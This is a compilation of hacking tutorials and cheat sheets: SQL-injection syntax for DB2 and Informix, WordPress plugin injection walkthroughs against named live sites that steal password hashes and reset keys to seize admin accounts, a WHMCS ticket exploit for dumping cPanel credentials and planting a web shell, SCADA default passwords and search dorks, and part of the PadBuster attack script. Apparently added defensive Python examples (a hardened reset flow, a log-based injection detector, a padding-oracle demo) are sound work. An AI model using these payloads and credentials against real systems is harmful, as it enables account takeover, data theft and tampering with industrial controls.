Bitwise AND This page seems to indicate that DB2 has no support for bitwise operators!
ASCII Value -> Char select chr(65) from sysibm.sysdummy1; -- returns 'A'
Char -> ASCII Value select ascii('A') from sysibm.sysdummy1; -- returns 65
Casting
SELECT cast('123' as integer) FROM sysibm.sysdummy1;
SELECT cast(1 as char) FROM sysibm.sysdummy1;
String Concatenation
SELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1; -- returns 'abc'
select 'a' || 'b' from sysibm.sysdummy1; -- returns 'ab'

Informix SQL Injection Cheat Sheet
Some useful syntax reminders for SQL Injection into Informix databases…
Below are some tabulated notes on how to do many of the things you'd normally do via SQL
injection. All tests were performed on Informix Dynamic Server Express Edition 11.5 for
Windows. The Informix download page is here.
Version
SELECT DBINFO('version', 'full') FROM systables WHERE tabid = 1;
SELECT DBINFO('version', 'server-type') FROM systables WHERE tabid = 1;
SELECT DBINFO('version', 'major'), DBINFO('version', 'minor'), DBINFO('version',
'level') FROM systables WHERE tabid = 1;
SELECT DBINFO('version', 'os') FROM systables WHERE tabid = 1; -- T=Windows,
U=32-bit app on 32-bit Unix, H=32-bit app running on 64-bit Unix, F=64-bit app
running on 64-bit Unix
Comments select 1 FROM systables WHERE tabid = 1; -- comment
Current User
SELECT USER FROM systables WHERE tabid = 1;
select CURRENT_ROLE FROM systables WHERE tabid = 1;
List Users select username, usertype, password from sysusers;
List Password Hashes TODO
List Privileges
select tabname, grantor, grantee, tabauth FROM systabauth join systables on
systables.tabid = systabauth.tabid; -- which tables are accessible by which users
select procname, owner, grantor, grantee from sysprocauth join sysprocedures
on sysprocauth.procid = sysprocedures.procid; -- which procedures are
accessible by which users
List DBA Accounts TODO
Current Database SELECT DBSERVERNAME FROM systables where tabid = 1; -- server name
List Databases select name, owner from sysdatabases;
List Columns
select tabname, colname, owner, coltype FROM syscolumns join systables on
syscolumns.tabid = systables.tabid;
List Tables
select tabname, owner FROM systables;
select tabname, viewtext FROM sysviews join systables on systables.tabid = sysviews.tabid;
List Stored Procedures select procname, owner FROM sysprocedures;
Find Tables From Column Name
select tabname, colname, owner, coltype FROM syscolumns join systables on
syscolumns.tabid = systables.tabid where colname like '%pass%';
Select Nth Row
select first 1 tabid from (select first 10 tabid from systables order by tabid) as sq
order by tabid desc; -- selects the 10th row
Select Nth Char
SELECT SUBSTRING('ABCD' FROM 3 FOR 1) FROM systables where tabid = 1; -- returns 'C'
Bitwise AND
select bitand(6, 1) from systables where tabid = 1; -- returns 0
select bitand(6, 2) from systables where tabid = 1; -- returns 2
ASCII Value -> Char TODO
Char -> ASCII Value select ascii('A') from systables where tabid = 1;
Casting
select cast('123' as integer) from systables where tabid = 1;
select cast(1 as char) from systables where tabid = 1;
String Concatenation
SELECT 'A' || 'B' FROM systables where tabid = 1; -- returns 'AB'
SELECT concat('A', 'B') FROM systables where tabid = 1; -- returns 'AB'
String Length
SELECT tabname, length(tabname), char_length(tabname),
octet_length(tabname) from systables;
If Statement TODO
Case Statement select tabid, case when tabid>10 then "High" else 'Low' end from systables;
Avoiding Quotes TODO
Time Delay TODO
Make DNS Requests TODO
Command Execution TODO
Local File Access TODO
Hostname, IP Address SELECT DBINFO('dbhostname') FROM systables WHERE tabid = 1; -- hostname
Location of DB files TODO
Default/System Databases
These are the system databases:
sysmaster
sysadmin*
sysuser*
sysutils*
* = don't seem to contain anything / don't allow reading
Installing Locally
You can download Informix Dynamic Server Express Edition 11.5 Trial for Linux and Windows.
Database Client
There's a database client SDK available, but I couldn't get the demo client working.
I used SQuirreL SQL Client Version 2.6.8 after installing the Informix JDBC drivers ("emerge
dev-java/jdbc-informix" on Gentoo).
Logging in from command line
If you get local admin rights on a Windows box and have a GUI logon:
- Click: Start | All Programs | IBM Informix Dynamic Server 11.50 | someservername. This will
give you a command prompt with various environment variables set properly.
- Run dbaccess.exe from your command prompt. This will bring up a text-based GUI that allows
you to browse databases.
The following were set on my test system. This may help if you get command line access, but
can't get a GUI - you'll need to change "testservername":
set INFORMIXDIR=C:\PROGRA~1\IBM\IBMINF~1\11.50
set INFORMIXSERVER=testservername
set ONCONFIG=ONCONFIG.testservername
set PATH=C:\PROGRA~1\IBM\IBMINF~1\11.50\bin;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\PROGRA~1\ibm\gsk7\bin;C:\PROGRA~1\ibm\gsk7\lib;C:\Program Files\IBM\Informix\Client-SDK\bin;C:\Program Files\ibm\gsk7\bin;C:\Program Files\ibm\gsk7\lib
set CLASSPATH=C:\PROGRA~1\IBM\IBMINF~1\11.50\extend\krakatoa\krakatoa.jar;C:\PROGRA~1\IBM\IBMINF~1\11.50\extend\krakatoa\jdbc.jar;
set DBTEMP=C:\PROGRA~1\IBM\IBMINF~1\11.50\infxtmp
set CLIENT_LOCALE=EN_US.CP1252
set DB_LOCALE=EN_US.8859-1
set SERVER_LOCALE=EN_US.CP1252
set DBLANG=EN_US.CP1252
mode con codepage select=1252
Identifying on the network
My default installation listened on two TCP ports: 9088 and 9099. When I created a new "server
name", this listened on 1526/TCP by default. Nmap 4.76 didn't identify these ports as Informix:
$ sudo nmap -sS -sV 10.0.0.1 -p- -v --version-all
1526/tcp open pdap-np?
9088/tcp open unknown
9089/tcp open unknown
TODO How would we identify Informix listening on the network?

WordPress Hacking Tricks

I. Hacking WordPress .. (Without Cracking the hashes)
you cannot exploit the latest version of wordpress with this .. 3.4.2 .. which was released on 6th September 2012
Things u need
1) any wordpress sqli dork .. (u can get it from exploit-db.com)
2) knowledge of sqli .. (coz this thread is not about sqli)
Lets Start ,
1) My Dork
There are number of sqli exploits in different plugins and themes of wordpress. The exploit im
picking is in one of the plugins called Wp-FacebookConnect.. and the google dork for it is ..
Code : inurl:"/?fbconnect_action=myhome"
now paste this code in google.com (one of my best frnds)
and u will see no. of vulnerable websites ..
2) now the website im going to use here is ..
Code : http://masaru.ikeda.me/?fbconnect_action=myhome&userid=2
> here the parameter userid is vulnerable to sqli ..
> so lets see what we can get from the data base ..
> im going to change the above URL with this
Code :
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email),7,8,9,10,11,12+from+wp_users--
> now u can see we got the username with the email id ..
> now if i change the above URL to this ..

Code :
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9,10,11,12+from+wp_users--
> im going to get the user name and the hashed password ..
> (point to be noted here .. im using concat here .. u can also use group_concat to get all the
users..
> again .. that would be ur knowledge how u use sqli)
> now .. we all know that wordpress hashes belong to the category MD5(wordpress).. (different
from simple MD5)
> and are very hard to crack ..
> but if ur mad .. u should think out of the box ..
> so now follow the steps ..
a) go to the login page of the wordpress site .. in my case that would be ..
Code : http://masaru.ikeda.me/wp-login.php
b) click on Lost your password ?
c) now the wordpress will ask me for the username or email .. for which i want to reset the
password .. in my case that is 'masaru' .. so go ahead and enter the username ..
d) now look closely .. it says .. "Check your e-mail for the confirmation link."
e) now what wordpress does actually .. it sends an activation key to the email address of that user
.. and it sets the value of activation key in the database aswell .. what u have to do is just to get
that key ..
f) so now im going to change my URL to this .. to get the activation key ..
Code :
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activation_key),7,8,9,10,11,12+from+wp_users--
NOTE: we got the activation key here .. u should note it down somewhere ..
g) Now .. finally all we have to do is .. without going to the email address .. reset the password ..
for that im going to add this to my URL ..
Code : wp-login.php?action=rp&key=KEYHERE&login=USER NAME HERE

and im going to replace the KEYHERE with the activation key i got .. and the USERNAME
HERE with the username .. which in my case is 'masaru' .. so my URL will be ..
Code : http://masaru.ikeda.me/wp-login.php?action=rp&key=cFn9vDsT3X2ZnW8vEda6&login=masaru
and VOILA .. the wordpress will ask u for ur new password ..
now go the login page again .. and try the new password .. and there u go .. u got access to the
panel ..
now u know how to shell the wordpress site .. don't u ??
Trick for those .. who are actually MAD:
1) Now to chk quickly if a website is using the latest version 3.4.2 or previous versions ..
> goto the login page and see .. if there is an option there to go back to the main page of the
blog..
> like in my case see the option .. <- Back to Digital Way of Living then this is not 3.4.2 ...
> if u don't see this option .. then it is 3.4.2 .. this trick is not legit .. i figured it out .. and is
working for me ..
2) once u have shelld the website ..
> get the database details ..
> use any database connector ..
> go to the table .. wp_users .. and in the column user_pass ..
> replace the hash with the one u got in the very beginning ..
> the actual hash of the admin .. now the password will be again what it was before ..
> as nothing happened .. admin will never know what hit 'em ..

Now .. in the latest version .. 3.4.2 .. what happens actually .. that after confirming the activation
key wordpress don't let you choose a new password .. rather . it actually sends u a random
password on ur Email ..
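Why the activation key read back in steps c) to g) is worth as much as the password once the users table can be read, shown as an added example that is not part of the original post: a minimal reset flow in Python, with sqlite3 standing in for the MySQL wp_users table (the schema is a constructed simplification), with the plaintext-key pattern beside a hardened one that stores only a hash of the key, gives it a lifetime and burns it on first use.

```python
import hashlib
import hmac
import secrets
import sqlite3
from datetime import datetime, timedelta, timezone

TOKEN_TTL = timedelta(hours=1)   # lifetime of a reset key in the hardened flow


def make_db():
    """Constructed stand-in for wp_users (sqlite3 in place of MySQL)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE wp_users (user_login TEXT PRIMARY KEY, user_email TEXT, "
               "user_activation_key TEXT NOT NULL DEFAULT '')")
    db.execute("INSERT INTO wp_users VALUES ('admin', 'admin@example.invalid', '')")
    return db


def read_activation_key(db, login):
    """Whatever the column holds is exactly what a UNION SELECT on wp_users hands back."""
    row = db.execute("SELECT user_activation_key FROM wp_users WHERE user_login = ?",
                     (login,)).fetchone()
    return row[0] if row else None


# --- Weak pattern: the mailed key is stored verbatim -------------------------
def request_reset_plain(db, login):
    key = secrets.token_urlsafe(16)            # this value is mailed to the user
    db.execute("UPDATE wp_users SET user_activation_key = ? WHERE user_login = ?",
               (key, login))
    return key


def verify_reset_plain(db, login, presented):
    stored = read_activation_key(db, login)
    return bool(stored) and hmac.compare_digest(stored, presented)


# --- Hardened pattern: store only a hash, bound the lifetime, single use -----
def request_reset_hashed(db, login, now):
    key = secrets.token_urlsafe(32)            # mailed to the user, never stored
    digest = hashlib.sha256(key.encode()).hexdigest()
    expires = int((now + TOKEN_TTL).timestamp())
    db.execute("UPDATE wp_users SET user_activation_key = ? WHERE user_login = ?",
               (f"{expires}:{digest}", login))
    return key


def verify_reset_hashed(db, login, presented, now):
    stored = read_activation_key(db, login)
    if not stored or ":" not in stored:
        return False
    expires, digest = stored.split(":", 1)
    if now.timestamp() > int(expires):
        return False                           # key expired
    ok = hmac.compare_digest(digest, hashlib.sha256(presented.encode()).hexdigest())
    if ok:                                     # burn the key on first successful use
        db.execute("UPDATE wp_users SET user_activation_key = '' WHERE user_login = ?",
                   (login,))
    return ok


def demo():
    """Replays the situation in the post: the users table is readable, the key leaks."""
    now = datetime(2012, 9, 6, tzinfo=timezone.utc)   # constructed timestamp
    db = make_db()

    request_reset_plain(db, "admin")
    leaked = read_activation_key(db, "admin")
    plain = verify_reset_plain(db, "admin", leaked)                # True: leak == key

    real_key = request_reset_hashed(db, "admin", now)
    leaked_digest = read_activation_key(db, "admin").split(":", 1)[1]
    hashed = (
        verify_reset_hashed(db, "admin", leaked_digest, now),      # False: hash is useless
        verify_reset_hashed(db, "admin", real_key, now),           # True: the mailed key
        verify_reset_hashed(db, "admin", real_key, now),           # False: already burned
    )

    second_key = request_reset_hashed(db, "admin", now)
    expired = verify_reset_hashed(db, "admin", second_key,
                                  now + TOKEN_TTL + timedelta(minutes=1))   # False
    return plain, hashed, expired


if __name__ == "__main__":
    print(demo())   # (True, (False, True, False), False)
```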

How To Hack WordPress Websites using SQL Injection:
Hacking Tutorial 5 comments
Tutorial:How To Hack WordPress Websites using SQL injection
What is Wordpress??
WordPress is a free and open source blogging tool and a content management system (CMS) based on
PHP and MySQL. It has many features including a plug-in architecture and a template system. WordPress
is currently the most popular blogging system in use on the Web. It was first released on May 27, 2003,
by its founders, including Matt Mullenweg.
Now lets move on to a hacking website.I have used here all-video-gallery(WordPress plugin) Sqli
Vulnerability..
1>First we will find a Target using a Google dork
inurl:all-video-gallery/config.php?vid=

2>Open any website.... In my case its juangrial.com.

3>now lets do a sql injection....copy the exploit code then hit enter then see the Magic...:)

Exploit Code for finding username & password: http://site.com/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid=-1+union+select+1,2,3,4,group_concat(user_login,0x3a,user_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+wp_users--

You can also try this.......well Both will work the same.........
Exploit Code for finding username & email: http://site.com/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid=-1+union+select+1,2,3,4,group_concat(user_login,0x3a,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+wp_users--

4>We Got admin Email......Now Let's reset it.....


For that GO to:- http://site.com/wp-admin OR https://site.com/wp-login.php
"Then click on Lost Password"

5>Enter the Email we Got IN earlier steps...


6>Now come back and go to activation table....
* Exploit Code for activation Key: http://site.com/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid=-1+union+select+1,2,3,4,group_concat(user_login,user_activation_key,0x3b),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+wp_users--

7>yeah!!!we got what we need now lets change the admin password...
goto:http://site.com/wp-login.php?action=rp&key=resetkey&login=username

8> Now open http://site.com/wp-admin and log in with the new password. xD
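For the hosting side, here is an added Python example (not from the slides) that runs the detection a WordPress host would want for the probe above over a few constructed access-log lines: it URL-decodes each query parameter before matching (so the `+`-encoded and `%20`-encoded UNION SELECT forms both match), flags `union select`, `group_concat`, `from wp_users` and a trailing comment, and separately flags the repeated `pid` parameter, since PHP keeps the last value of a duplicated parameter and that is the one the injected query rides on. The log lines, addresses and timestamps are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed access-log lines (not from the slides): two benign requests, then the
# UNION SELECT probe against config.php in its '+' form and in a '%20' form.
SAMPLE_LOG = """\
203.0.113.5 - - [22/Dec/2014:10:01:02 +0000] "GET /wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11 HTTP/1.1" 200 512
203.0.113.5 - - [22/Dec/2014:10:01:09 +0000] "GET /wp-login.php HTTP/1.1" 200 2048
198.51.100.7 - - [22/Dec/2014:10:02:30 +0000] "GET /wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid=-1+union+select+1,2,3,4,group_concat(user_login,0x3a,user_pass),6+from+wp_users-- HTTP/1.1" 200 611
198.51.100.7 - - [22/Dec/2014:10:02:41 +0000] "GET /wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid=-1%20UNION%20SELECT%201,2,3,4,group_concat(user_login,user_activation_key,0x3b),6%20FROM%20wp_users--%20 HTTP/1.1" 200 598
"""

# Common Log Format: ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)

# Patterns are matched against the decoded parameter value, never against the raw URL.
SQLI_PATTERNS = {
    "union_select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
    "wp_users_table": re.compile(r"\bfrom\s+wp_users\b", re.I),
    "comment_terminator": re.compile(r"(?:--|/\*)\s*$"),
}


def normalize(value):
    """URL-decode up to twice so a doubly encoded payload does not slip past the regexes."""
    for _ in range(2):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyze_query(query):
    """Return the list of finding tags for one query string (empty when it looks benign)."""
    findings = []
    seen = {}
    for name, raw in parse_qsl(query, keep_blank_values=True):
        seen[name] = seen.get(name, 0) + 1
        value = normalize(raw)
        for label, pattern in SQLI_PATTERNS.items():
            tag = f"{label}:{name}"
            if pattern.search(value) and tag not in findings:
                findings.append(tag)
    # HTTP parameter pollution: the probe sends pid twice and relies on PHP keeping the last one.
    for name, count in seen.items():
        if count > 1:
            findings.append(f"duplicate_param:{name}x{count}")
    return findings


def scan_log(text):
    """Parse each log line and collect the requests that carry at least one finding."""
    hits = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        parts = urlsplit(match["target"])
        findings = analyze_query(parts.query)
        if findings:
            hits.append({"ip": match["ip"], "path": parts.path, "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["path"], ", ".join(hit["findings"]))
```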

DNS Zone Transfer Vulnerability Exploit

- Scan the website with Acunetix Web Vulnerability Scanner.
- If it reports a DNS zone transfer vulnerability:
- Open a command prompt (Run > cmd) and start nslookup, then run the following at the nslookup prompt:

C:\> nslookup
> server <website name>
> set type=any
> ls -d <website name>

Hacking SCADA Systems
With the discovery of Stuxnet and all the subsequent interest in industrial control systems, it's worthwhile to learn a bit about how to exploit these for our own purposes. For now it's a copy-paste of various information on ICS products. Eventually I will rewrite it as a fluent tutorial, but until then you can use this article as a starting point in your own research.
Contents:
- Terminology
- Default Passwords
- Google Dorks
- Vulnerabilities and Other Resources
Terminology :
PLC: Programmable Logic Controller
RTU: Remote Terminal Unit
HMI: Human-Machine Interface
Default Passwords :
These should always be your first try if you come across a listed HMI. Because these systems have only recently received much attention, many of these HMIs still have their default credentials. They can be accessed through a web panel, Telnet, or VNC. Links to support documents have been provided to familiarize yourself with these systems.
Schneider Electrics :
pcfactory:pcfactory
loader:fwdownload
ntpupdate:ntpupdate
sysdiag:factorycast@schneider
test:testingpw
USER:USER
USER:USERUSER
webserver:webpages

fdrusers:sresurdf
nic2212:poiuypoiuy
nimrohs2212:qwertyqwerty
nip2212:fcsdfcsd
ftpuser:ftpuser
noe77111_v500:RcSyyebczS
AUTCSE:RybQRceeSd
AUT_CSE:cQdd9debez
target:RcQbRbzRyc
Siemens Simatic :
Administrator:100
Siemens WinCC :
WinCCConnect:2WSXcder
WinCCAdmin:2WSXcder
WAGO :
admin:wago
Google Dorks :
These will be added to as I go along, but are just a couple you can try out to search for HMIs.
inurl:/plc/webvisu.htm
"Miniweb on" "Control Functions" -filetype:pdf
Vulnerabilities and Other Resources
Vulnerabilities in some SCADA server software
Metasploit Modules for SCADA-related Vulnerabilities
SIMATIC HMI panels - some default Simatic HMIs you can play around with

WHMCS Hacking with Submit Ticket Exploit

Hi Mates!
Today we are going to learn how to hack WHMCS, or you can say its submit ticket exploit, through which we will get the cPanel username and password of the hosting panel and of the websites hosted on that WHMCS.
Let's start.
step 1 : Get a website which provides hosting and find the "submit ticket" option.
step 2 : Now open the submit ticket option and click on the sales department.



step 3 : Now we have to fill in the following info: name, email address and urgency (put any random info in these fields); the main thing is the subject field.

Fill this code in the subject field:


Then scroll down, fill in the CAPTCHA and click the submit button.






We will be redirected to the next page, where it will show the cPanel username and password.
Boom! You have the cPanel usernames and passwords of the hosting panel and of the websites hosted on that server.
If you are lucky, you may also get the FTP and SMTP passwords too!

OK, that was all about the cPanel, FTP and SMTP passwords. If the WHMCS doesn't have any website hosted on it, you won't get anything. Then what?
Don't be sad. :)
We have one more trick, and this will help you upload a shell on the WHMCS website. :)
How?
Let's move. :)
Come back to the submit ticket page and put any random info in the email, name and urgency fields. The main step is to put the PHP code in the subject field. This time we are going to put PHP code which, if it gets executed successfully, gives us an uploader on the website through which we will be able to upload a shell. So let's start.

Fill in any random info in the other fields and put this PHP code in the subject field:


Fill in the CAPTCHA and click enter. Now, first of all, have a look at the submit ticket URL, for example:
http://www.website.com/client/submitticket.php
To get the uploader, replace submitticket.php with downloads/indexx.php. Remember, it's indexx.php: when the code executes, it creates indexx.php, and that is the uploader. So open the URL
http://www.website.com/client/downloads/indexx.php
and you will see a file upload option!

Browse to the shell and click upload. After uploading the shell, open the URL
http://www.website.com/client/downloads/shell_name.php
Hell yeah, owned :D

WHMCS Auto Exploiter
- Take the WHMCS auto exploiter PHP script.
- Upload it to some PHP server.
- In the Google Dork field, make your own dork and click Exploit, like:

Dorks :

inurl:submitticket.php site:.com
inurl:submitticket.php site:.net
inurl:submitticket.php site:.us
inurl:submitticket.php site:.eu
inurl:submitticket.php site:.org
inurl:submitticket.php site:.uk
intext:”Powered by WHMCompleteSolution”
intext:”Powered by WHMCompleteSolution” inurl:clientarea.php
inurl:announcements.php intext:”WHMCompleteSolution”
intext:”Powered by WHMCS”

- Crack the hash.
- Go to the site, open the admin panel and log in.

Padding Oracle Attack Using Burp Suite

Requirements:

- Microsoft SQL Server 2008 R2
- Burp Suite Professional v1.4.07
- exe.bat [ Save it in Notepad and rename it exe.bat ]

@echo off
cmd

- padBuster.pl [ Save the script below in Notepad and rename it padBuster.pl ]
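Before the script itself, here is an added Python example (not from the slides and not PadBuster's code) that shows what PadBuster's response-analysis phase is looking for and why the attack works at all: an endpoint that decrypts a CBC token and then lets the PKCS#7 padding check decide the HTTP status answers a sweep over the last byte of the preceding ciphertext block with two distinct responses, while an endpoint that verifies an HMAC over the token before decrypting answers every tampered token identically. A small SHA-256-based Feistel network stands in for AES (assumption: any keyed block permutation behaves the same here); the key, IV and message are constructed.

```python
import hashlib
import hmac
from collections import Counter

BLOCK = 16  # cipher block size in bytes (the BlockSize argument PadBuster asks for)

# Constructed demo values, not real secrets
KEY = b"constructed-demo-key"
MAC_KEY = b"constructed-mac-key"
IV = bytes(range(BLOCK))
MESSAGE = b"user=alice;role=user"  # 20 bytes: the final block ends in 12 padding bytes


def _round(key, rnd, half):
    """Keyed round function of the stand-in cipher (SHA-256 truncated to a half block)."""
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:BLOCK // 2]

def _feistel(key, block, rounds):
    """4-round Feistel network standing in for AES: rounds in order encrypt, reversed decrypt."""
    left, right = block[:BLOCK // 2], block[BLOCK // 2:]
    for rnd in rounds:
        left, right = right, bytes(a ^ b for a, b in zip(left, _round(key, rnd, right)))
    return right + left

def encrypt_block(key, block):
    return _feistel(key, block, range(4))

def decrypt_block(key, block):
    return _feistel(key, block, reversed(range(4)))

def pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    """PKCS#7 check; the ValueError raised here is the signal a padding oracle leaks."""
    n = data[-1] if data else 0
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, iv, plaintext):
    out, prev = b"", iv
    for i in range(0, len(plaintext), BLOCK):
        prev = encrypt_block(key, bytes(a ^ b for a, b in zip(plaintext[i:i + BLOCK], prev)))
        out += prev
    return out

def cbc_decrypt(key, iv, ciphertext):
    out, prev = b"", iv
    for i in range(0, len(ciphertext), BLOCK):
        block = ciphertext[i:i + BLOCK]
        out += bytes(a ^ b for a, b in zip(decrypt_block(key, block), prev))
        prev = block
    return out

def leaky_oracle(key, token):
    """Vulnerable endpoint: token = IV || ciphertext is decrypted first and the padding
    check picks the status (500 on bad padding, else 200). That difference is the oracle."""
    try:
        unpad(cbc_decrypt(key, token[:BLOCK], token[BLOCK:]))
    except ValueError:
        return 500
    return 200

def hardened_oracle(key, mac_key, token):
    """Encrypt-then-MAC endpoint: token = IV || ciphertext || HMAC-SHA256 tag. The tag is
    verified in constant time before any decryption, so every tampered token gets 400."""
    body, tag = token[:-32], token[-32:]
    if not hmac.compare_digest(hmac.new(mac_key, body, hashlib.sha256).digest(), tag):
        return 400
    unpad(cbc_decrypt(key, body[:BLOCK], body[BLOCK:]))  # reached only by genuine tokens
    return 200

def response_analysis(oracle, token, pos):
    """What PadBuster's response-analysis phase does: send the token with one byte set to
    each of its 255 other values and tally the responses. Two classes means an oracle."""
    counts = Counter()
    for v in range(256):
        if v != token[pos]:
            counts[oracle(token[:pos] + bytes([v]) + token[pos + 1:])] += 1
    return counts

def demo():
    token = IV + cbc_encrypt(KEY, IV, pad(MESSAGE))
    # Sweep the last byte of the block before the final ciphertext block: in CBC it XORs
    # straight into the final plaintext byte, i.e. into the padding.
    pos = len(token) - BLOCK - 1
    leaky = response_analysis(lambda t: leaky_oracle(KEY, t), token, pos)
    tag = hmac.new(MAC_KEY, token, hashlib.sha256).digest()
    hardened = response_analysis(lambda t: hardened_oracle(KEY, MAC_KEY, t), token + tag, pos)
    return leaky, hardened  # {500: 254, 200: 1} for the leaky endpoint, {400: 255} for the hardened one
```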
#!/usr/bin/perl
#
# PadBuster v0.3.3 - Automated script for performing Padding Oracle attacks
# Brian Holyfield - Gotham Digital Science ([email protected])
#
# Credits to J.Rizzo and T.Duong for providing proof of concept web exploit
# techniques and S.Vaudenay for initial discovery of the attack. Credits also
# to James M. Martin ([email protected]) for sharing proof of concept exploit
# code for performing various brute force attack techniques, and wireghoul (Eldar
# Marcussen) for making code quality improvements.
#

use LWP::UserAgent;
use strict;
use warnings;
use Getopt::Std;
use MIME::Base64;

use URI::Escape;
use Getopt::Long;
use Time::HiRes qw( gettimeofday );
use Compress::Zlib;
use Crypt::SSLeay;

# Set defaults with $variable = value
my $logFiles;
my $post;
my $encoding = 0;
my $headers;
my $cookie;
my $error;
my $prefix;
my $intermediaryInput;
my $cipherInput;
my $plainTextInput;
my $encodedPlainTextInput;
my $noEncodeOption;
my $superVerbose;
my $proxy;
my $proxyAuth;
my $noIv;
my $auth;
my $resumeBlock;
my $interactive = 0;

my $bruteForce;
my $ignoreContent;
my $useBody;
my $verbose;

GetOptions( "log" => \$logFiles,
"post=s" => \$post,
"encoding=s" => \$encoding,
"headers=s" => \$headers,
"cookies=s" => \$cookie,
"error=s" => \$error,
"prefix=s" => \$prefix,
"intermediate=s" => \$intermediaryInput,
"ciphertext=s" => \$cipherInput,
"plaintext=s" => \$plainTextInput,
"encodedtext=s" => \$encodedPlainTextInput,
"noencode" => \$noEncodeOption,
"veryverbose" => \$superVerbose,
"proxy=s" => \$proxy,
"proxyauth=s" => \$proxyAuth,
"noiv" => \$noIv,
"auth=s" => \$auth,
"resume=s" => \$resumeBlock,
"interactive" => \$interactive,
"bruteforce" => \$bruteForce,
"ignorecontent" => \$ignoreContent,

"usebody" => \$useBody,
"verbose" => \$verbose);

print "\n+-------------------------------------------+\n";
print "| PadBuster - v0.3.3 |\n";
print "| Brian Holyfield - Gotham Digital Science |\n";
print "| labs\@gdssecurity.com |\n";
print "+-------------------------------------------+\n";

if ($#ARGV < 2) {
die "
Use: padBuster.pl URL EncryptedSample BlockSize [options]

Where: URL = The target URL (and query string if applicable)
EncryptedSample = The encrypted value you want to test. Must
also be present in the URL, PostData or a Cookie
BlockSize = The block size being used by the algorithm

Options:
-auth [username:password]: HTTP Basic Authentication
-bruteforce: Perform brute force against the first block
-ciphertext [Bytes]: CipherText for Intermediate Bytes (Hex-Encoded)
-cookies [HTTP Cookies]: Cookies (name1=value1; name2=value2)
-encoding [0-4]: Encoding Format of Sample (Default 0)
0=Base64, 1=Lower HEX, 2=Upper HEX
3=.NET UrlToken, 4=WebSafe Base64

-encodedtext [Encoded String]: Data to Encrypt (Encoded)
-error [Error String]: Padding Error Message
-headers [HTTP Headers]: Custom Headers (name1::value1;name2::value2)
-interactive: Prompt for confirmation on decrypted bytes
-intermediate [Bytes]: Intermediate Bytes for CipherText (Hex-Encoded)
-log: Generate log files (creates folder PadBuster.DDMMYY)
-noencode: Do not URL-encode the payload (encoded by default)
-noiv: Sample does not include IV (decrypt first block)
-plaintext [String]: Plain-Text to Encrypt
-post [Post Data]: HTTP Post Data String
-prefix [Prefix]: Prefix bytes to append to each sample (Encoded)
-proxy [address:port]: Use HTTP/S Proxy
-proxyauth [username:password]: Proxy Authentication
-resume [Block Number]: Resume at this block number
-usebody: Use response body content for response analysis phase
-verbose: Be Verbose
-veryverbose: Be Very Verbose (Debug Only)

";}

# Ok, if we've made it this far we are ready to begin..
my $url = $ARGV[0];
my $sample = $ARGV[1];
my $blockSize = $ARGV[2];

if ($url eq "" || $sample eq "" || $blockSize eq "") {

print "\nERROR: The URL, EncryptedSample and BlockSize cannot be null.\n";
exit();
}

# Hard Coded Inputs
#$post = "";
#$sample = "";

my $method = $post ? "POST" : "GET";

# These are file related variables
my $dirName = "PadBuster." . &getTime("F");
my $dirSlash = "/";
my $dirCmd = "mkdir ";
if (defined($ENV{'OS'})) {
if ($ENV{OS} =~ /Windows/) {
$dirSlash = "\\";
$dirCmd = "md ";
}
}
my $dirExists = 0;
my $printStats = 0;
my $requestTracker = 0;
my $timeTracker = 0;

if ($encoding < 0 || $encoding > 4) {

print "\nERROR: Encoding must be a value between 0 and 4\n";
exit();
}
my $encodingFormat = $encoding ? $encoding : 0;

my $encryptedBytes = $sample;
my $totalRequests = 0;

# See if the sample needs to be URL decoded, otherwise don't (the plus from B64 will be a problem)
if ($sample =~ /\%/) {
$encryptedBytes = &uri_unescape($encryptedBytes)
}

# Prep the sample for regex use
$sample = quotemeta $sample;

# Now decode
$encryptedBytes = &myDecode($encryptedBytes, $encodingFormat);
if ( (length($encryptedBytes) % $blockSize) > 0) {
print "\nERROR: Encrypted Bytes must be evenly divisible by Block Size ($blockSize)\n";
print " Encrypted sample length is ".int(length($encryptedBytes)).". Double check the Encoding and Block Size.\n";
exit();
}

# If no IV, then append nulls as the IV (only if decrypting)
if ($noIv && !$bruteForce && !$plainTextInput) {
$encryptedBytes = "\x00" x $blockSize . $encryptedBytes;
}

# PlainTextBytes is where the complete decrypted sample will be stored (decrypt only)
